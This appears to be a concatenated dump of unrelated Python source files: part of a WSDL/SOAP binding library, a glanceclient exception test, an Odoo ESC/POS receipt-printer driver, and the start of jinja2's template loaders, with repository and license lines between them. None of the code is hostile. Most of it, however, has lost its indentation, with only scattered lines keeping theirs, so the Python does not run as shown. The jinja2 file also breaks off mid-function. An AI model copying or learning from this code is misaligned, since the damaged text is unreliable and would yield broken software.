return wsdl.bindings[self.binding]
def getPortType(self):
"""Return the PortType object that is referenced by this port."""
wsdl = self.getService().getWSDL()
binding = wsdl.bindings[self.binding]
return wsdl.portTypes[binding.type]
def getAddressBinding(self):
"""A convenience method to obtain the extension element used
as the address binding for the port."""
for item in self.extensions:
if isinstance(item, SoapAddressBinding) or \
isinstance(item, HttpAddressBinding):
return item
raise WSDLError(
'No address binding found in port.'
)
def load_ex(self, elements):
for e in elements:
ns, name = e.namespaceURI, e.localName
if ns in DOM.NS_SOAP_BINDING_ALL and name == 'address':
location = DOM.getAttr(e, 'location', default=None)
ob = SoapAddressBinding(location)
self.addExtension(ob)
continue
elif ns in DOM.NS_HTTP_BINDING_ALL and name == 'address':
location = DOM.getAttr(e, 'location', default=None)
ob = HttpAddressBinding(location)
self.addExtension(ob)
continue
else:
self.addExtension(e)
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), "port")
epc.setAttributeNS(None, "name", self.name)
ns,name = self.binding
prefix = epc.getPrefix(ns)
epc.setAttributeNS(None, "binding", "%s:%s" %(prefix,name))
node = epc._getNode()
for ext in self.extensions:
ext.toDom(node)
class SoapBinding:
def __init__(self, transport, style='rpc'):
self.transport = transport
self.style = style
def getWSDL(self):
return self.parent().getWSDL()
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLSoapBindingUri(wsdl.version), 'binding')
if self.transport:
epc.setAttributeNS(None, "transport", self.transport)
if self.style:
epc.setAttributeNS(None, "style", self.style)
class SoapAddressBinding:
def __init__(self, location):
self.location = location
def getWSDL(self):
return self.parent().getWSDL()
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLSoapBindingUri(wsdl.version), 'address')
epc.setAttributeNS(None, "location", self.location)
class SoapOperationBinding:
def __init__(self, soapAction=None, style=None):
self.soapAction = soapAction
self.style = style
def getWSDL(self):
return self.parent().getWSDL()
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLSoapBindingUri(wsdl.version), 'operation')
if self.soapAction:
epc.setAttributeNS(None, 'soapAction', self.soapAction)
if self.style:
epc.setAttributeNS(None, 'style', self.style)
class SoapBodyBinding:
def __init__(self, use, namespace=None, encodingStyle=None, parts=None):
if not use in ('literal', 'encoded'):
raise WSDLError(
'Invalid use attribute value: %s' % use
)
self.encodingStyle = encodingStyle
self.namespace = namespace
if type(parts) in (type(''), type(u'')):
parts = parts.split()
self.parts = parts
self.use = use
def getWSDL(self):
return self.parent().getWSDL()
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLSoapBindingUri(wsdl.version), 'body')
epc.setAttributeNS(None, "use", self.use)
epc.setAttributeNS(None, "namespace", self.namespace)
class SoapFaultBinding:
def __init__(self, name, use, namespace=None, encodingStyle=None):
if not use in ('literal', 'encoded'):
raise WSDLError(
'Invalid use attribute value: %s' % use
)
self.encodingStyle = encodingStyle
self.namespace = namespace
self.name = name
self.use = use
def getWSDL(self):
return self.parent().getWSDL()
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
        # Serialize as soap:fault (the original mistakenly emitted 'body').
        epc = ep.createAppendElement(DOM.GetWSDLSoapBindingUri(wsdl.version), 'fault')
epc.setAttributeNS(None, "use", self.use)
epc.setAttributeNS(None, "name", self.name)
if self.namespace is not None:
epc.setAttributeNS(None, "namespace", self.namespace)
if self.encodingStyle is not None:
epc.setAttributeNS(None, "encodingStyle", self.encodingStyle)
class SoapHeaderBinding:
def __init__(self, message, part, use, namespace=None, encodingStyle=None):
if not use in ('literal', 'encoded'):
raise WSDLError(
'Invalid use attribute value: %s' % use
)
self.encodingStyle = encodingStyle
self.namespace = namespace
self.message = message
self.part = part
self.use = use
tagname = 'header'
class SoapHeaderFaultBinding(SoapHeaderBinding):
tagname = 'headerfault'
class HttpBinding:
def __init__(self, verb):
self.verb = verb
class HttpAddressBinding:
def __init__(self, location):
self.location = location
class HttpOperationBinding:
def __init__(self, location):
self.location = location
class HttpUrlReplacementBinding:
pass
class HttpUrlEncodedBinding:
pass
class MimeContentBinding:
def __init__(self, part=None, type=None):
self.part = part
self.type = type
class MimeXmlBinding:
def __init__(self, part=None):
self.part = part
class MimeMultipartRelatedBinding:
def __init__(self):
self.parts = []
def load_ex(self, elements):
for e in elements:
ns, name = e.namespaceURI, e.localName
if ns in DOM.NS_MIME_BINDING_ALL and name == 'part':
self.parts.append(MimePartBinding())
continue
class MimePartBinding:
def __init__(self):
self.items = []
def load_ex(self, elements):
for e in elements:
ns, name = e.namespaceURI, e.localName
if ns in DOM.NS_MIME_BINDING_ALL and name == 'content':
part = DOM.getAttr(e, 'part', default=None)
type = DOM.getAttr(e, 'type', default=None)
ob = MimeContentBinding(part, type)
self.items.append(ob)
continue
elif ns in DOM.NS_MIME_BINDING_ALL and name == 'mimeXml':
part = DOM.getAttr(e, 'part', default=None)
ob = MimeXmlBinding(part)
self.items.append(ob)
continue
elif ns in DOM.NS_SOAP_BINDING_ALL and name == 'body':
encstyle = DOM.getAttr(e, 'encodingStyle', default=None)
namespace = DOM.getAttr(e, 'namespace', default=None)
parts = DOM.getAttr(e, 'parts', default=None)
use = DOM.getAttr(e, 'use', default=None)
if use is None:
raise WSDLError(
'Invalid soap:body binding element.'
)
ob = SoapBodyBinding(use, namespace, encstyle, parts)
self.items.append(ob)
continue
class WSDLError(Exception):
pass
def DeclareNSPrefix(writer, prefix, nsuri):
if writer.hasNSPrefix(nsuri):
return
writer.declareNSPrefix(prefix, nsuri)
def ParseTypeRef(value, element):
parts = value.split(':', 1)
if len(parts) == 1:
return (DOM.findTargetNS(element), value)
nsuri = DOM.findNamespaceURI(parts[0], element)
return (nsuri, parts[1])
def ParseQName(value, element):
nameref = value.split(':', 1)
if len(nameref) == 2:
nsuri = DOM.findNamespaceURI(nameref[0], element)
name = nameref[-1]
else:
nsuri = DOM.findTargetNS(element)
name = nameref[-1]
return nsuri, name
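# Worked example (comments added for illustration, not in the original
# source): with xmlns:tns="urn:example" in scope of `element`,
#   ParseQName('tns:Quote', element)  -> ('urn:example', 'Quote')
# while an unprefixed value falls back to the element's target namespace:
#   ParseQName('Quote', element)      -> (<targetNS of element>, 'Quote')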
def GetDocumentation(element):
docnode = DOM.getElement(element, 'documentation', None, None)
if docnode is not None:
return DOM.getElementText(docnode)
return ''
def GetExtensions(element):
return [ item for item in DOM.getElements(element, None, None)
if item.namespaceURI != DOM.NS_WSDL ]
def GetWSAActionFault(operation, name):
"""Find wsa:Action attribute, and return value or WSA.FAULT
for the default.
"""
attr = operation.faults[name].action
if attr is not None:
return attr
return WSA.FAULT
def GetWSAActionInput(operation):
"""Find wsa:Action attribute, and return value or the default."""
attr = operation.input.action
if attr is not None:
return attr
portType = operation.getPortType()
targetNamespace = portType.getTargetNamespace()
ptName = portType.name
msgName = operation.input.name
if not msgName:
msgName = operation.name + 'Request'
if targetNamespace.endswith('/'):
return '%s%s/%s' %(targetNamespace, ptName, msgName)
return '%s/%s/%s' %(targetNamespace, ptName, msgName)
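# Worked default (comments added for illustration, not in the original
# source): for a portType named 'StockQuote' in targetNamespace
# 'urn:example' and an unnamed input on operation 'GetLastTradePrice',
# the derived action is 'urn:example/StockQuote/GetLastTradePriceRequest';
# a namespace already ending in '/' drops the extra separator.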
def GetWSAActionOutput(operation):
"""Find wsa:Action attribute, and return value or the default."""
attr = operation.output.action
if attr is not None:
return attr
targetNamespace = operation.getPortType().getTargetNamespace()
ptName = operation.getPortType().name
msgName = operation.output.name
if not msgName:
msgName = operation.name + 'Response'
if targetNamespace.endswith('/'):
return '%s%s/%s' %(targetNamespace, ptName, msgName)
return '%s/%s/%s' %(targetNamespace, ptName, msgName)
def FindExtensions(object, kind, t_type=type(())):
if isinstance(kind, t_type):
result = []
namespaceURI, name = kind
return [ item for item in object.extensions
if hasattr(item, 'nodeType') \
and DOM.nsUriMatch(namespaceURI, item.namespaceURI) \
and item.name == name ]
return [ item for item in object.extensions if isinstance(item, kind) ]
def FindExtension(object, kind, t_type=type(())):
if isinstance(kind, t_type):
namespaceURI, name = kind
for item in object.extensions:
if hasattr(item, 'nodeType') \
and DOM.nsUriMatch(namespaceURI, item.namespaceURI) \
and item.name == name:
return item
else:
for item in object.extensions:
if isinstance(item, kind):
return item
return None
class SOAPCallInfo:
"""SOAPCallInfo captures the important binding information about a
SOAP operation, in a structure that is easier to work with than
raw WSDL structures."""
def __init__(self, methodName):
self.methodName = methodName
self.inheaders = []
self.outheaders = []
self.inparams = []
self.outparams = []
self.retval = None
encodingStyle = DOM.NS_SOAP_ENC
documentation = ''
soapAction = None
transport = None
namespace = None
location = None
use = 'encoded'
style = 'rpc'
def addInParameter(self, name, type, namespace=None, element_type=0):
"""Add an input parameter description to the call info."""
parameter = ParameterInfo(name, type, namespace, element_type)
self.inparams.append(parameter)
return parameter
def addOutParameter(self, name, type, namespace=None, element_type=0):
"""Add an output parameter description to the call info."""
parameter = ParameterInfo(name, type, namespace, element_type)
self.outparams.append(parameter)
return parameter
def setReturnParameter(self, name, type, namespace=None, element_type=0):
"""Set the return parameter description for the call info."""
parameter = ParameterInfo(name, type, namespace, element_type)
self.retval = parameter
return parameter
def addInHeaderInfo(self, name, type, namespace, element_type=0,
mustUnderstand=0):
"""Add an input SOAP header description to the call info."""
headerinfo = HeaderInfo(name, type, namespace, element_type)
if mustUnderstand:
headerinfo.mustUnderstand = 1
self.inheaders.append(headerinfo)
return headerinfo
def addOutHeaderInfo(self, name, type, namespace, element_type=0,
mustUnderstand=0):
"""Add an output SOAP header description to the call info."""
headerinfo = HeaderInfo(name, type, namespace, element_type)
if mustUnderstand:
headerinfo.mustUnderstand = 1
self.outheaders.append(headerinfo)
return headerinfo
def getInParameters(self):
"""Return a sequence of the in parameters of the method."""
return self.inparams
def getOutParameters(self):
"""Return a sequence of the out parameters of the method."""
return self.outparams
def getReturnParameter(self):
"""Return param info about the return value of the method."""
return self.retval
def getInHeaders(self):
"""Return a sequence of the in headers of the method."""
return self.inheaders
def getOutHeaders(self):
"""Return a sequence of the out headers of the method."""
return self.outheaders
class ParameterInfo:
"""A ParameterInfo object captures parameter binding information."""
def __init__(self, name, type, namespace=None, element_type=0):
if element_type:
self.element_type = 1
if namespace is not None:
self.namespace = namespace
self.name = name
self.type = type
element_type = 0
namespace = None
default = None
class HeaderInfo(ParameterInfo):
"""A HeaderInfo object captures SOAP header binding information."""
def __init__(self, name, type, namespace, element_type=None):
ParameterInfo.__init__(self, name, type, namespace, element_type)
mustUnderstand = 0
actor = None
def callInfoFromWSDL(port, name):
"""Return a SOAPCallInfo given a WSDL port and operation name."""
wsdl = port.getService().getWSDL()
binding = port.getBinding()
portType = binding.getPortType()
operation = portType.operations[name]
opbinding = binding.operations[name]
messages = wsdl.messages
callinfo = SOAPCallInfo(name)
addrbinding = port.getAddressBinding()
if not isinstance(addrbinding, SoapAddressBinding):
raise ValueError, 'Unsupported binding type.'
callinfo.location = addrbinding.location
soapbinding = binding.findBinding(SoapBinding)
if soapbinding is None:
raise ValueError, 'Missing soap:binding element.'
callinfo.transport = soapbinding.transport
callinfo.style = soapbinding.style or 'document'
soap_op_binding = opbinding.findBinding(SoapOperationBinding)
if soap_op_binding is not None:
callinfo.soapAction = soap_op_binding.soapAction
callinfo.style = soap_op_binding.style or callinfo.style
parameterOrder = operation.parameterOrder
if operation.input is not None:
message = messages[operation.input.message]
msgrole = opbinding.input
mime = msgrole.findBinding(MimeMultipartRelatedBinding)
if mime is not None:
raise ValueError, 'Mime bindings are not supported.'
else:
for item in msgrole.findBindings(SoapHeaderBinding):
part = messages[item.message].parts[item.part]
header = callinfo.addInHeaderInfo(
part.name,
part.element or part.type,
item.namespace,
element_type = part.element and 1 or 0
)
header.encodingStyle = item.encodingStyle
body = msgrole.findBinding(SoapBodyBinding)
if body is None:
raise ValueError, 'Missing soap:body binding.'
callinfo.encodingStyle = body.encodingStyle
callinfo.namespace = body.namespace
callinfo.use = body.use
if body.parts is not None:
parts = []
for name in body.parts:
parts.append(message.parts[name])
else:
parts = message.parts.values()
for part in parts:
callinfo.addInParameter(
part.name,
part.element or part.type,
element_type = part.element and 1 or 0
)
if operation.output is not None:
try:
message = messages[operation.output.message]
except KeyError:
            # wsdl.strict, not self.strict: this is a module-level function,
            # so the original reference raised a NameError.
            if wsdl.strict:
                raise RuntimeError(
                    "Received message not defined in the WSDL schema: %s" %
                    operation.output.message)
            else:
                message = wsdl.addMessage(operation.output.message)
                print "Warning:", \
                      "Received message not defined in the WSDL schema.", \
                      "Adding it."
                print "Message:", operation.output.message
msgrole = opbinding.output
mime = msgrole.findBinding(MimeMultipartRelatedBinding)
if mime is not None:
raise ValueError, 'Mime bindings are not supported.'
else:
for item in msgrole.findBindings(SoapHeaderBinding):
part = messages[item.message].parts[item.part]
header = callinfo.addOutHeaderInfo(
part.name,
part.element or part.type,
item.namespace,
element_type = part.element and 1 or 0
)
header.encodingStyle = item.encodingStyle
body = msgrole.findBinding(SoapBodyBinding)
if body is None:
raise ValueError, 'Missing soap:body binding.'
callinfo.encodingStyle = body.encodingStyle
callinfo.namespace = body.namespace
callinfo.use = body.use
if body.parts is not None:
parts = []
for name in body.parts:
parts.append(message.parts[name])
else:
parts = message.parts.values()
if parts:
for part in parts:
callinfo.addOutParameter(
part.name,
part.element or part.type,
element_type = part.element and 1 or 0
)
return callinfo
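# --- Illustrative addition, not part of the original module ---
# A minimal driving sketch for callInfoFromWSDL; the service, port and
# operation names below are hypothetical placeholders.
def _example_call_info(wsdl):
    port = wsdl.services['StockQuoteService'].ports['StockQuotePort']
    info = callInfoFromWSDL(port, 'GetLastTradePrice')
    # location and soapAction come from the SOAP address/operation bindings.
    return info.location, info.soapAction, [p.name for p in info.getInParameters()]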
|
agpl-3.0
|
tylertian/Openstack
|
openstack F/python-glanceclient/tests/test_exc.py
|
3
|
1035
|
# Copyright 2012 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import testtools
from glanceclient import exc
FakeResponse = collections.namedtuple('HTTPResponse', ['status'])
class TestHTTPExceptions(testtools.TestCase):
def test_from_response(self):
"""exc.from_response should return instance of an HTTP exception."""
out = exc.from_response(FakeResponse(400))
self.assertTrue(isinstance(out, exc.HTTPBadRequest))
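    # A parallel check, sketched for illustration (not in the original test);
    # it assumes the same status-to-class mapping covers 404.
    def test_from_response_not_found(self):
        out = exc.from_response(FakeResponse(404))
        self.assertTrue(isinstance(out, exc.HTTPNotFound))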
|
apache-2.0
|
savoirfairelinux/OpenUpgrade
|
addons/hw_escpos/controllers/main.py
|
125
|
14043
|
# -*- coding: utf-8 -*-
import commands
import logging
import simplejson
import os
import os.path
import io
import base64
import openerp
import time
import random
import math
import md5
import openerp.addons.hw_proxy.controllers.main as hw_proxy
import pickle
import re
import subprocess
import traceback
from threading import Thread, Lock
from Queue import Queue, Empty
try:
import usb.core
except ImportError:
usb = None
try:
from .. import escpos
from ..escpos import printer
from ..escpos import supported_devices
except ImportError:
escpos = printer = None
from PIL import Image
from openerp import http
from openerp.http import request
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class EscposDriver(Thread):
def __init__(self):
Thread.__init__(self)
self.queue = Queue()
self.lock = Lock()
self.status = {'status':'connecting', 'messages':[]}
def supported_devices(self):
if not os.path.isfile('escpos_devices.pickle'):
return supported_devices.device_list
else:
try:
f = open('escpos_devices.pickle','r')
                # Load before closing; the original returned first, so the
                # close was unreachable and the file handle leaked.
                devices = pickle.load(f)
                f.close()
                return devices
except Exception as e:
self.set_status('error',str(e))
return supported_devices.device_list
def add_supported_device(self,device_string):
        r = re.compile('[0-9A-Fa-f]{4}:[0-9A-Fa-f]{4}')
match = r.search(device_string)
if match:
match = match.group().split(':')
vendor = int(match[0],16)
product = int(match[1],16)
name = device_string.split('ID')
if len(name) >= 2:
name = name[1]
else:
name = name[0]
_logger.info('ESC/POS: adding support for device: '+match[0]+':'+match[1]+' '+name)
device_list = supported_devices.device_list[:]
if os.path.isfile('escpos_devices.pickle'):
try:
f = open('escpos_devices.pickle','r')
device_list = pickle.load(f)
f.close()
except Exception as e:
self.set_status('error',str(e))
device_list.append({
'vendor': vendor,
'product': product,
'name': name,
})
try:
f = open('escpos_devices.pickle','w+')
f.seek(0)
pickle.dump(device_list,f)
f.close()
except Exception as e:
self.set_status('error',str(e))
def connected_usb_devices(self):
connected = []
for device in self.supported_devices():
            if usb.core.find(idVendor=device['vendor'], idProduct=device['product']) is not None:
connected.append(device)
return connected
def lockedstart(self):
with self.lock:
if not self.isAlive():
self.daemon = True
self.start()
def get_escpos_printer(self):
try:
printers = self.connected_usb_devices()
if len(printers) > 0:
self.set_status('connected','Connected to '+printers[0]['name'])
return escpos.printer.Usb(printers[0]['vendor'], printers[0]['product'])
else:
self.set_status('disconnected','Printer Not Found')
return None
except Exception as e:
self.set_status('error',str(e))
return None
def get_status(self):
self.push_task('status')
return self.status
def open_cashbox(self,printer):
printer.cashdraw(2)
printer.cashdraw(5)
def set_status(self, status, message = None):
_logger.info(status+' : '+ (message or 'no message'))
if status == self.status['status']:
if message != None and (len(self.status['messages']) == 0 or message != self.status['messages'][-1]):
self.status['messages'].append(message)
else:
self.status['status'] = status
if message:
self.status['messages'] = [message]
else:
self.status['messages'] = []
if status == 'error' and message:
_logger.error('ESC/POS Error: '+message)
elif status == 'disconnected' and message:
_logger.warning('ESC/POS Device Disconnected: '+message)
def run(self):
if not escpos:
_logger.error('ESC/POS cannot initialize, please verify system dependencies.')
return
while True:
try:
timestamp, task, data = self.queue.get(True)
printer = self.get_escpos_printer()
                if printer is None:
if task != 'status':
self.queue.put((timestamp,task,data))
time.sleep(5)
continue
                elif task == 'receipt':
                    # Drop receipts that have been queued for over an hour.
                    if timestamp >= time.time() - 1 * 60 * 60:
                        self.print_receipt_body(printer,data)
                        printer.cut()
                elif task == 'xml_receipt':
                    if timestamp >= time.time() - 1 * 60 * 60:
                        printer.receipt(data)
                elif task == 'cashbox':
                    # Cashbox pulses are only meaningful for a few seconds.
                    if timestamp >= time.time() - 12:
                        self.open_cashbox(printer)
elif task == 'printstatus':
self.print_status(printer)
elif task == 'status':
pass
except Exception as e:
self.set_status('error', str(e))
errmsg = str(e) + '\n' + '-'*60+'\n' + traceback.format_exc() + '-'*60 + '\n'
                _logger.error(errmsg)
def push_task(self,task, data = None):
self.lockedstart()
self.queue.put((time.time(),task,data))
def print_status(self,eprint):
        # Collect the box's non-loopback IPv4 addresses by scraping ifconfig
        # output (Python 2 'commands' module).
        localips = ['0.0.0.0','127.0.0.1','127.0.1.1']
        ips = [ c.split(':')[1].split(' ')[0] for c in commands.getoutput("/sbin/ifconfig").split('\n') if 'inet addr' in c ]
        ips = [ ip for ip in ips if ip not in localips ]
eprint.text('\n\n')
eprint.set(align='center',type='b',height=2,width=2)
eprint.text('PosBox Status\n')
eprint.text('\n')
eprint.set(align='center')
if len(ips) == 0:
eprint.text('ERROR: Could not connect to LAN\n\nPlease check that the PosBox is correc-\ntly connected with a network cable,\n that the LAN is setup with DHCP, and\nthat network addresses are available')
elif len(ips) == 1:
eprint.text('IP Address:\n'+ips[0]+'\n')
else:
eprint.text('IP Addresses:\n')
for ip in ips:
eprint.text(ip+'\n')
if len(ips) >= 1:
eprint.text('\nHomepage:\nhttp://'+ips[0]+':8069\n')
eprint.text('\n\n')
eprint.cut()
def print_receipt_body(self,eprint,receipt):
def check(string):
return string != True and bool(string) and string.strip()
def price(amount):
return ("{0:."+str(receipt['precision']['price'])+"f}").format(amount)
def money(amount):
return ("{0:."+str(receipt['precision']['money'])+"f}").format(amount)
def quantity(amount):
if math.floor(amount) != amount:
return ("{0:."+str(receipt['precision']['quantity'])+"f}").format(amount)
else:
return str(amount)
def printline(left, right='', width=40, ratio=0.5, indent=0):
lwidth = int(width * ratio)
rwidth = width - lwidth
lwidth = lwidth - indent
left = left[:lwidth]
if len(left) != lwidth:
left = left + ' ' * (lwidth - len(left))
right = right[-rwidth:]
if len(right) != rwidth:
right = ' ' * (rwidth - len(right)) + right
return ' ' * indent + left + right + '\n'
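        # Illustration (comment added for clarity, not in the original code):
        # printline('Total', '9.99', width=20, ratio=0.5) pads the left field
        # to 10 columns and right-justifies the right field in the remaining
        # 10, yielding 'Total' + 11 spaces + '9.99' + '\n' (20 chars + newline).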
def print_taxes():
taxes = receipt['tax_details']
for tax in taxes:
eprint.text(printline(tax['tax']['name'],price(tax['amount']), width=40,ratio=0.6))
# Receipt Header
if receipt['company']['logo']:
eprint.set(align='center')
eprint.print_base64_image(receipt['company']['logo'])
eprint.text('\n')
else:
eprint.set(align='center',type='b',height=2,width=2)
eprint.text(receipt['company']['name'] + '\n')
eprint.set(align='center',type='b')
if check(receipt['company']['contact_address']):
eprint.text(receipt['company']['contact_address'] + '\n')
if check(receipt['company']['phone']):
eprint.text('Tel:' + receipt['company']['phone'] + '\n')
if check(receipt['company']['vat']):
eprint.text('VAT:' + receipt['company']['vat'] + '\n')
if check(receipt['company']['email']):
eprint.text(receipt['company']['email'] + '\n')
if check(receipt['company']['website']):
eprint.text(receipt['company']['website'] + '\n')
if check(receipt['header']):
eprint.text(receipt['header']+'\n')
if check(receipt['cashier']):
eprint.text('-'*32+'\n')
eprint.text('Served by '+receipt['cashier']+'\n')
# Orderlines
eprint.text('\n\n')
eprint.set(align='center')
for line in receipt['orderlines']:
pricestr = price(line['price_display'])
if line['discount'] == 0 and line['unit_name'] == 'Unit(s)' and line['quantity'] == 1:
eprint.text(printline(line['product_name'],pricestr,ratio=0.6))
else:
eprint.text(printline(line['product_name'],ratio=0.6))
if line['discount'] != 0:
eprint.text(printline('Discount: '+str(line['discount'])+'%', ratio=0.6, indent=2))
if line['unit_name'] == 'Unit(s)':
eprint.text( printline( quantity(line['quantity']) + ' x ' + price(line['price']), pricestr, ratio=0.6, indent=2))
else:
eprint.text( printline( quantity(line['quantity']) + line['unit_name'] + ' x ' + price(line['price']), pricestr, ratio=0.6, indent=2))
# Subtotal if the taxes are not included
taxincluded = True
if money(receipt['subtotal']) != money(receipt['total_with_tax']):
            eprint.text(printline('','-------'))
eprint.text(printline(_('Subtotal'),money(receipt['subtotal']),width=40, ratio=0.6))
print_taxes()
#eprint.text(printline(_('Taxes'),money(receipt['total_tax']),width=40, ratio=0.6))
taxincluded = False
# Total
        eprint.text(printline('','-------'))
        eprint.set(align='center',height=2)
        eprint.text(printline(_(' TOTAL'),money(receipt['total_with_tax']),width=40, ratio=0.6))
        eprint.text('\n\n')
# Paymentlines
eprint.set(align='center')
for line in receipt['paymentlines']:
eprint.text(printline(line['journal'], money(line['amount']), ratio=0.6))
        eprint.text('\n')
eprint.set(align='center',height=2)
eprint.text(printline(_(' CHANGE'),money(receipt['change']),width=40, ratio=0.6))
eprint.set(align='center')
        eprint.text('\n')
# Extra Payment info
if receipt['total_discount'] != 0:
eprint.text(printline(_('Discounts'),money(receipt['total_discount']),width=40, ratio=0.6))
if taxincluded:
print_taxes()
#eprint.text(printline(_('Taxes'),money(receipt['total_tax']),width=40, ratio=0.6))
# Footer
if check(receipt['footer']):
eprint.text('\n'+receipt['footer']+'\n\n')
eprint.text(receipt['name']+'\n')
        # the date dict uses a 0-based month (JavaScript convention), hence the +1
        eprint.text( str(receipt['date']['date']).zfill(2)
                    +'/'+ str(receipt['date']['month']+1).zfill(2)
                    +'/'+ str(receipt['date']['year']).zfill(4)
                    +' '+ str(receipt['date']['hour']).zfill(2)
                    +':'+ str(receipt['date']['minute']).zfill(2) )
driver = EscposDriver()
driver.push_task('printstatus')
hw_proxy.drivers['escpos'] = driver
class EscposProxy(hw_proxy.Proxy):
@http.route('/hw_proxy/open_cashbox', type='json', auth='none', cors='*')
def open_cashbox(self):
_logger.info('ESC/POS: OPEN CASHBOX')
driver.push_task('cashbox')
@http.route('/hw_proxy/print_receipt', type='json', auth='none', cors='*')
def print_receipt(self, receipt):
_logger.info('ESC/POS: PRINT RECEIPT')
driver.push_task('receipt',receipt)
@http.route('/hw_proxy/print_xml_receipt', type='json', auth='none', cors='*')
def print_xml_receipt(self, receipt):
_logger.info('ESC/POS: PRINT XML RECEIPT')
driver.push_task('xml_receipt',receipt)
@http.route('/hw_proxy/escpos/add_supported_device', type='http', auth='none', cors='*')
def add_supported_device(self, device_string):
_logger.info('ESC/POS: ADDED NEW DEVICE:'+device_string)
driver.add_supported_device(device_string)
return "The device:\n"+device_string+"\n has been added to the list of supported devices.<br/><a href='/hw_proxy/status'>Ok</a>"
@http.route('/hw_proxy/escpos/reset_supported_devices', type='http', auth='none', cors='*')
def reset_supported_devices(self):
        try:
            os.remove('escpos_devices.pickle')
        except OSError:
            # the devices file may not exist yet; nothing to reset in that case
            pass
return 'The list of supported devices has been reset to factory defaults.<br/><a href="/hw_proxy/status">Ok</a>'
|
agpl-3.0
|
kastriothaliti/techstitution
|
venv/lib/python2.7/site-packages/jinja2/loaders.py
|
333
|
17380
|
# -*- coding: utf-8 -*-
"""
jinja2.loaders
~~~~~~~~~~~~~~
Jinja loader classes.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import weakref
from types import ModuleType
from os import path
from hashlib import sha1
from jinja2.exceptions import TemplateNotFound
from jinja2.utils import open_if_exists, internalcode
from jinja2._compat import string_types, iteritems
def split_template_path(template):
"""Split a path into segments and perform a sanity check. If it detects
'..' in the path it will raise a `TemplateNotFound` error.
"""
pieces = []
for piece in template.split('/'):
if path.sep in piece \
or (path.altsep and path.altsep in piece) or \
piece == path.pardir:
raise TemplateNotFound(template)
elif piece and piece != '.':
pieces.append(piece)
return pieces
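# Behaviour sketch (hypothetical inputs): split_template_path('users/./index.html')
# returns ['users', 'index.html'], while split_template_path('users/../secret')
# raises TemplateNotFound because of the '..' segment.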
class BaseLoader(object):
"""Baseclass for all loaders. Subclass this and override `get_source` to
implement a custom loading mechanism. The environment provides a
`get_template` method that calls the loader's `load` method to get the
:class:`Template` object.
A very basic example for a loader that looks up templates on the file
system could look like this::
from jinja2 import BaseLoader, TemplateNotFound
from os.path import join, exists, getmtime
class MyLoader(BaseLoader):
def __init__(self, path):
self.path = path
def get_source(self, environment, template):
path = join(self.path, template)
if not exists(path):
raise TemplateNotFound(template)
mtime = getmtime(path)
                with open(path) as f:
source = f.read().decode('utf-8')
return source, path, lambda: mtime == getmtime(path)
"""
#: if set to `False` it indicates that the loader cannot provide access
#: to the source of templates.
#:
#: .. versionadded:: 2.4
has_source_access = True
def get_source(self, environment, template):
"""Get the template source, filename and reload helper for a template.
It's passed the environment and template name and has to return a
tuple in the form ``(source, filename, uptodate)`` or raise a
`TemplateNotFound` error if it can't locate the template.
        The source part of the returned tuple must be the source of the
        template as a unicode string or an ASCII bytestring. The filename
        should be the name of the file on the filesystem if it was loaded
        from there, otherwise `None`. The filename is used by Python for
        tracebacks if no loader extension is used.
The last item in the tuple is the `uptodate` function. If auto
reloading is enabled it's always called to check if the template
changed. No arguments are passed so the function must store the
old state somewhere (for example in a closure). If it returns `False`
the template will be reloaded.
"""
if not self.has_source_access:
raise RuntimeError('%s cannot provide access to the source' %
self.__class__.__name__)
raise TemplateNotFound(template)
def list_templates(self):
"""Iterates over all templates. If the loader does not support that
it should raise a :exc:`TypeError` which is the default behavior.
"""
raise TypeError('this loader cannot iterate over all templates')
@internalcode
def load(self, environment, name, globals=None):
"""Loads a template. This method looks up the template in the cache
or loads one by calling :meth:`get_source`. Subclasses should not
override this method as loaders working on collections of other
loaders (such as :class:`PrefixLoader` or :class:`ChoiceLoader`)
will not call this method but `get_source` directly.
"""
code = None
if globals is None:
globals = {}
# first we try to get the source for this template together
# with the filename and the uptodate function.
source, filename, uptodate = self.get_source(environment, name)
# try to load the code from the bytecode cache if there is a
# bytecode cache configured.
bcc = environment.bytecode_cache
if bcc is not None:
bucket = bcc.get_bucket(environment, name, filename, source)
code = bucket.code
        # if we don't have code so far (not cached, or no longer up to
        # date) we compile the template
if code is None:
code = environment.compile(source, name, filename)
# if the bytecode cache is available and the bucket doesn't
# have a code so far, we give the bucket the new code and put
# it back to the bytecode cache.
if bcc is not None and bucket.code is None:
bucket.code = code
bcc.set_bucket(bucket)
return environment.template_class.from_code(environment, code,
globals, uptodate)
class FileSystemLoader(BaseLoader):
"""Loads templates from the file system. This loader can find templates
in folders on the file system and is the preferred way to load them.
The loader takes the path to the templates as string, or if multiple
locations are wanted a list of them which is then looked up in the
given order::
>>> loader = FileSystemLoader('/path/to/templates')
>>> loader = FileSystemLoader(['/path/to/templates', '/other/path'])
Per default the template encoding is ``'utf-8'`` which can be changed
by setting the `encoding` parameter to something else.
To follow symbolic links, set the *followlinks* parameter to ``True``::
>>> loader = FileSystemLoader('/path/to/templates', followlinks=True)
.. versionchanged:: 2.8+
The *followlinks* parameter was added.
"""
def __init__(self, searchpath, encoding='utf-8', followlinks=False):
if isinstance(searchpath, string_types):
searchpath = [searchpath]
self.searchpath = list(searchpath)
self.encoding = encoding
self.followlinks = followlinks
def get_source(self, environment, template):
pieces = split_template_path(template)
for searchpath in self.searchpath:
filename = path.join(searchpath, *pieces)
f = open_if_exists(filename)
